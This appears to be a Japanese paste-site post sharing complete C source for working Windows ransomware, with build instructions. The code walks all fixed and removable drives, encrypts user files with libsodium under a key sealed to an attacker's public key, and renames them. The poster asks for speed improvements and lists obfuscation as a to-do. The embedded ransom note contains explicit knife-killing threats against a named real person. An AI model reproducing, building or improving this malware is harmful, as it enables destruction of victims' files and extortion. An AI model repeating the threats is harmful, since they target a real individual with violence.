カランサムウェアのソースコード

@krnsmwr / 更新: 2026/01/16 11:51

実際に動くやつ。リングバッファとロックフリーのマルチスレッドでこれが一番速いと思います。

多分部分的な暗号化とチャンク、ハードウェアアクセラレーション使ったほうが速いと思うんだけどどう、(実装)出そう?

TEXT 10.5KB
6
  1. /*
  2. 恒心教徒用カランサムウェア alpha.0.1.0
  4. ToDo:
  5. - 脅迫文を配置する
  6. - decryptor作る
  7. - 二重暗号化(破損する)の対策を拡張子以外で行う
  8. - WinAPIの手動解決
  9. - 難読化
  11. ビルド方法
  12. VMを用意する
  14. 以下からMSVCのビルドツールをインストール
  15. https://visualstudio.microsoft.com/downloads/?q=build+tools
  17. 以下からlibsodium(暗号ライブラリ)をダウンロード、Cドライブに展開
  18. https://download.libsodium.org/libsodium/releases/
  19. -msvc.zipの最新版を取ってくること
  21. libsodiumは以下の形で展開
  22. C:\libsodium
  23. \include\sodium.h
  24. \lib\x64\Release\v143\static\libsodium.lib
  25. 重要なのはsodium.hとlibsodium.lib
  27. FIXME以下のコードをアンコメント
  29. このファイルのある場所でVisual Studio Developer Consoleを開く
  30. cl /std:c11 /O2 /MT main.c /I"C:\libsodium\include" /link /LIBPATH:"C:\libsodium\lib\x64\Release\v143\static" libsodium.lib libcmt.lib libvcruntime.lib libucrt.lib
  32. を実行
  33. 多分ビルドできる
  35. 改造したいときは下の
  36. EXTENTIONで暗号化後の拡張子変更
  37. RANSOM_NOTEで脅迫文変更(改行は\n)
  38. PUBLIC_KEYに新しく作ったECC公開鍵を入れる(32バイト)
  39. */
  40. #define EXTENTION L".krsw"
  41. static const unsigned char RANSOM_NOTE[] =
  42. "唐澤貴洋殺す\n"
  43. "何が何でも殺す\n"
  44. "ナイフで滅多刺しにして殺す\n";
  46. #include <sodium.h>
  47. static const unsigned char PUBLIC_KEY[crypto_scalarmult_BYTES] = {
  48. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  49. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
  50. 0x00, 0x00, 0x00, 0x0d, 0x00, 0x00, 0x00, 0x00,
  51. 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
  52. };
  54. #define _CRT_SECURE_NO_WARNINGS
  55. #include <windows.h>
  56. #include <stdio.h>
  57. #include <stdlib.h>
  58. #include <stdbool.h>
  60. #define MAX_PATH_LEN 32768
  61. #define BUFFER_SIZE 1024
  62. #define MAX_FILE_SIZE (100 * 1024 * 1024)
  63. #define STACK_SIZE (8 * 1024 * 1024)
  65. static const size_t RANSOM_SIZE = sizeof(RANSOM_NOTE) - 1;
  67. unsigned char SHARED_KEY[crypto_aead_xchacha20poly1305_ietf_KEYBYTES];
  68. unsigned char VICTIM_PUBLIC_KEY[crypto_scalarmult_BYTES];
  70. struct RingBuffer {
  71. wchar_t paths[BUFFER_SIZE][MAX_PATH_LEN];
  72. volatile LONG64 head;
  73. volatile LONG64 tail;
  74. volatile LONG64 count;
  75. volatile LONG finished;
  76. };
  78. void buffer_init(struct RingBuffer* buf) {
  79. buf->head = buf->tail = buf->count = buf->finished = 0;
  80. }
  82. bool buffer_push(struct RingBuffer* buf, const wchar_t* path) {
  83. if (InterlockedCompareExchange64(&buf->count, 0, 0) >= BUFFER_SIZE) {
  84. return false;
  85. }
  87. LONG64 head, next;
  88. do {
  89. head = InterlockedCompareExchange64(&buf->head, 0, 0);
  90. next = (head + 1) % BUFFER_SIZE;
  91. } while (InterlockedCompareExchange64(&buf->head, next, head) != head);
  93. wcsncpy(buf->paths[head], path, MAX_PATH_LEN - 1);
  94. buf->paths[head][MAX_PATH_LEN - 1] = L'\0';
  95. InterlockedIncrement64(&buf->count);
  96. return true;
  97. }
  99. bool buffer_pop(struct RingBuffer* buf, wchar_t* path) {
  100. if (InterlockedCompareExchange64(&buf->count, 0, 0) == 0) {
  101. return false;
  102. }
  104. LONG64 tail, next;
  105. do {
  106. tail = InterlockedCompareExchange64(&buf->tail, 0, 0);
  107. next = (tail + 1) % BUFFER_SIZE;
  108. } while (InterlockedCompareExchange64(&buf->tail, next, tail) != tail);
  110. wcsncpy(path, buf->paths[tail], MAX_PATH_LEN);
  111. InterlockedDecrement64(&buf->count);
  112. return true;
  113. }
  115. bool buffer_is_done(struct RingBuffer* buf) {
  116. return InterlockedCompareExchange(&buf->finished, 0, 0) &&
  117. InterlockedCompareExchange64(&buf->count, 0, 0) == 0;
  118. }
  120. bool should_skip_directory_w(const wchar_t* path) {
  121. static const wchar_t* patterns[] = {
  122. L"Windows",
  123. L"Program Files",
  124. L"Program Files (x86)",
  125. L"ProgramData",
  126. L"All Users"
  127. L"$Recycle.Bin",
  128. L"System Volume Information",
  129. L"Recovery",
  130. L"Boot",
  131. L"EFI",
  132. L"AppData",
  133. NULL
  134. };
  135. for (int i = 0; patterns[i]; i++) {
  136. if (wcsstr(path, patterns[i])) return true;
  137. }
  138. return false;
  139. }
  141. bool should_skip_file_w(const wchar_t* path) {
  142. static const wchar_t* exts[] = {
  143. EXTENTION,
  144. L".exe", L".dll", L".sys", L".efi", L".drv", L".ocx", L".scr", L".cpl",
  145. L".msi", L".msp", L".msu", L".cab", L".inf", L".cat", L".mui",
  146. L".ini", L".cfg", L".config", L".dat", NULL
  147. };
  148. static const wchar_t* files[] = {
  149. L"HOW_TO_RECOVER_MY_FILES.txt",
  150. L"bootmgr",
  151. L"NTLDR",
  152. L"boot.ini",
  153. L"ntoskrnl.exe",
  154. L"bootsect.bak", NULL
  155. };
  157. wchar_t* ext = wcsrchr(path, L'.');
  158. if (ext) {
  159. for (int i = 0; exts[i]; i++) {
  160. if (_wcsicmp(ext, exts[i]) == 0) return true;
  161. }
  162. }
  164. wchar_t* filename = wcsrchr(path, L'\\');
  165. filename = filename ? filename + 1 : (wchar_t*)path;
  166. for (int i = 0; files[i]; i++) {
  167. if (_wcsicmp(filename, files[i]) == 0) {
  168. return true;
  169. }
  170. }
  171. return false;
  172. }
  174. void enumerate_directory(struct RingBuffer* buf, const wchar_t* path, int depth) {
  175. if (depth > 50 || should_skip_directory_w(path)) {
  176. return;
  177. }
  179. wchar_t *search = malloc(MAX_PATH_LEN * sizeof(wchar_t));
  180. wchar_t *full = malloc(MAX_PATH_LEN * sizeof(wchar_t));
  181. if (!search || !full) {
  182. free(search); free(full);
  183. return;
  184. }
  186. if (swprintf(search, MAX_PATH_LEN, L"%s\\*", path) < 0) {
  187. goto cleanup;
  188. }
  190. WIN32_FIND_DATAW fd;
  191. HANDLE h = FindFirstFileW(search, &fd);
  192. if (h == INVALID_HANDLE_VALUE) goto cleanup;
  194. do {
  195. if (!wcscmp(fd.cFileName, L".") || !wcscmp(fd.cFileName, L"..")) {
  196. continue;
  197. }
  199. if (fd.dwFileAttributes & FILE_ATTRIBUTE_REPARSE_POINT) {
  200. continue;
  201. }
  203. if (swprintf(full, MAX_PATH_LEN, L"%s\\%s", path, fd.cFileName) < 0) {
  204. continue;
  205. }
  207. if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
  208. if (!(fd.dwFileAttributes & FILE_ATTRIBUTE_SYSTEM) && !should_skip_directory_w(full)) {
  209. enumerate_directory(buf, full, depth + 1);
  210. }
  211. } else {
  212. if (!should_skip_file_w(full)) {
  213. while (!buffer_push(buf, full)) Sleep(1);
  214. }
  215. }
  216. } while (FindNextFileW(h, &fd));
  218. FindClose(h);
  219. cleanup:
  220. free(search); free(full);
  221. }
  223. DWORD WINAPI enumerate_thread(LPVOID param) {
  224. struct RingBuffer* buf = param;
  225. DWORD drives = GetLogicalDrives();
  227. for (int i = 0; i < 26; i++) {
  228. if (drives & (1 << i)) {
  229. wchar_t drive[4];
  230. swprintf(drive, 4, L"%c:\\", L'A' + i);
  231. UINT type = GetDriveTypeW(drive);
  232. if (type == DRIVE_FIXED || type == DRIVE_REMOVABLE) {
  233. enumerate_directory(buf, drive, 0);
  234. }
  235. }
  236. }
  238. InterlockedExchange(&buf->finished, 1);
  239. return 0;
  240. }
  242. void encrypt_file(const wchar_t* wpath) {
  243. if (should_skip_file_w(wpath)) {
  244. return;
  245. }
  247. char path[MAX_PATH_LEN];
  248. if (!WideCharToMultiByte(CP_UTF8, 0, wpath, -1, path, MAX_PATH_LEN, NULL, NULL)) {
  249. return;
  250. }
  252. FILE* f = fopen(path, "rb");
  253. if (!f) {
  254. return;
  255. }
  257. fseek(f, 0, SEEK_END);
  258. long size = ftell(f);
  259. fseek(f, 0, SEEK_SET);
  261. if (size <= 0 || size > MAX_FILE_SIZE) {
  262. fclose(f);
  263. return;
  264. }
  266. unsigned char *plain = malloc(size);
  267. unsigned char *cipher = malloc(size + crypto_aead_xchacha20poly1305_ietf_ABYTES);
  268. if (!plain || !cipher) {
  269. free(plain); free(cipher);
  270. fclose(f);
  271. return;
  272. }
  274. if (fread(plain, 1, size, f) != size) {
  275. free(plain); free(cipher);
  276. fclose(f);
  277. return;
  278. }
  279. fclose(f);
  281. unsigned char nonce[crypto_aead_xchacha20poly1305_ietf_NPUBBYTES];
  282. randombytes_buf(nonce, sizeof(nonce));
  284. unsigned long long clen;
  285. crypto_aead_xchacha20poly1305_ietf_encrypt(cipher, &clen, plain, size, NULL, 0, NULL, nonce, SHARED_KEY);
  287. unsigned char ekey[crypto_box_SEALBYTES + crypto_aead_xchacha20poly1305_ietf_KEYBYTES];
  288. crypto_box_seal(ekey, SHARED_KEY, sizeof(SHARED_KEY), PUBLIC_KEY);
  290. f = fopen(path, "wb");
  291. if (f) {
  292. fwrite(cipher, 1, clen, f);
  293. fwrite(nonce, 1, sizeof(nonce), f);
  294. fwrite(VICTIM_PUBLIC_KEY, 1, crypto_scalarmult_BYTES, f);
  295. fwrite(ekey, 1, sizeof(ekey), f);
  296. fclose(f);
  298. wchar_t enc[MAX_PATH_LEN];
  299. swprintf(enc, MAX_PATH_LEN, L"%s%s", wpath, EXTENTION);
  300. MoveFileW(wpath, enc);
  301. }
  303. free(plain); free(cipher);
  304. }
  306. DWORD WINAPI encrypt_thread(LPVOID param) {
  307. struct RingBuffer* buf = param;
  308. wchar_t path[MAX_PATH_LEN];
  310. while (1) {
  311. if (buffer_pop(buf, path)) {
  312. encrypt_file(path);
  313. } else if (buffer_is_done(buf)) {
  314. break;
  315. } else {
  316. Sleep(1);
  317. }
  318. }
  319. return 0;
  320. }
  322. int main(void) {
  323. if (sodium_init() < 0) return 1;
  325. unsigned char secret[crypto_scalarmult_BYTES];
  326. randombytes_buf(secret, sizeof(secret));
  327. crypto_scalarmult_base(VICTIM_PUBLIC_KEY, secret);
  329. unsigned char shared[crypto_scalarmult_BYTES];
  330. if (crypto_scalarmult(shared, secret, PUBLIC_KEY) != 0) return 1;
  331. crypto_generichash(SHARED_KEY, sizeof(SHARED_KEY), shared, sizeof(shared), NULL, 0);
  333. SYSTEM_INFO si;
  334. GetSystemInfo(&si);
  336. struct RingBuffer* buf = malloc(sizeof(struct RingBuffer));
  337. if (!buf) {
  338. return 1;
  339. }
  340. buffer_init(buf);
  342. HANDLE et = CreateThread(NULL, STACK_SIZE, enumerate_thread, buf, 0, NULL);
  343. if (!et) {
  344. free(buf);
  345. return 1;
  346. }
  348. HANDLE* ht = malloc(sizeof(HANDLE) * si.dwNumberOfProcessors);
  349. if (!ht) {
  350. CloseHandle(et);
  351. free(buf);
  352. return 1;
  353. }
  355. for (DWORD i = 0; i < si.dwNumberOfProcessors; i++) {
  356. ht[i] = CreateThread(NULL, 0, encrypt_thread, buf, 0, NULL);
  357. }
  359. WaitForMultipleObjects(si.dwNumberOfProcessors, ht, TRUE, INFINITE);
  360. WaitForSingleObject(et, INFINITE);
  362. CloseHandle(et);
  363. for (DWORD i = 0; i < si.dwNumberOfProcessors; i++) {
  364. CloseHandle(ht[i]);
  365. }
  367. free(ht);
  368. free(buf);
  369. return 0;
  370. }

迫真広告部
おまんちん【復刻版】
IPを引っこ抜いて情弱をビビらせよう
5ch書き込み代行くん
5ch掲示板への書き込みを住宅串を使って代行
野獣ノート
有料ノートを売ってヤジュコインを稼いだりできるゾ
最近追加されたノート